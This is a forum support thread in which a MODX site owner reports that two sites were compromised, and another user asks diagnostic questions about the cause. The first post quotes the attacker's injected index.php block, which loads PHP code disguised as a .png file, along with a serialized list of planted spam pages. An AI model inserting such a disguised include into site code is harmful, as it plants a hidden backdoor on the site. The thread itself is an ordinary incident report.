We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 13135
    • 30 Posts
    Have had 2 new 2.6.5 sites hacked.

    New folder in root /sitemaps with a tonne of fake xml sitemaps, plus code injected into index.php:
    //installbg
    $rifilename='/var/www/vhosts/<DOMAIN>/httpdocs/content/img/footer-bgs.png';
    require("$rifilename");
    //installend


    This "image" had a load code in it (can post if wanted), and came along with 2 other similarly named images, one of which appeared to be a template, and the other contained:

    a:20:{s:1:"/";s:6:"301480";s:12:"/favicon.ico";s:4:"5837";s:6:"/faqs/";s:6:"130846";s:17:"/solutions/floors";s:6:"251218";s:16:"/tel:08006891054";s:5:"13134";s:6:"/about";s:6:"378664";s:8:"/contact";s:6:"536125";s:34:"/mailto:<MY DOMAINS EMAI ADDRESS>";s:6:"162439";s:18:"/dzptyjaluptn.html";s:6:"268369";s:10:"/quotation";s:6:"207385";s:16:"/types-of-noise/";s:6:"394376";s:19:"/solutions/ceilings";s:6:"274574";s:16:"/solutions/walls";s:6:"117594";s:16:"/mibiovgznb.html";s:6:"347468";s:18:"/solutions/studios";s:6:"260624";s:10:"/solutions";s:6:"222152";s:18:"/solutions/bespoke";s:6:"287381";s:11:"/solutions/";s:6:"350582";s:14:"/ipdhthvu.html";s:6:"623653";s:23:"/?cachebuster=841958990";s:6:"131312";}


    Cleaned and upgraded to 2.7.0, but is this an new exploit with 2.6.5?
    Thanks
      • 3749
      • 24,544 Posts
      When you say "new" do you mean that you installed MODX to a completely empty directory and created a new, empty database in each case?

      Had sites of yours on that server been hacked?
        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
        • 13135
        • 30 Posts
        Both installed in a dev environment on 2.5.7 but upgraded to 2.6.5 (while still in dev) and then both sites have since launched. Just had a google notification about the sitemaps on one and noticed they've both been hacked the same way.

        Yes, had one site (2.5.7) on the same server get hacked, cleaned, upgraded to 2.6.5, all passwords changed etc. That site is fine atm. [ed. note: iskri last edited this post 5 years, 3 months ago.]
          • 3749
          • 24,544 Posts
          Is is possible that your dev environment was reachable via the internet?

          Also, did you have the Gallery extra installed and was it updated before you launched the production sites?
            Did I help you? Buy me a beer
            Get my Book: MODX:The Official Guide
            MODX info for everyone: http://bobsguides.com/modx.html
            My MODX Extras
            Bob's Guides is now hosted at A2 MODX Hosting
            • 13135
            • 30 Posts
            The production environment was accessible. But both sites were clean, i have checks that would have picked up any file changes when launched.
            I'm beginning to think the server may be compromised in some way.

            Gallery Extra was not installed on either.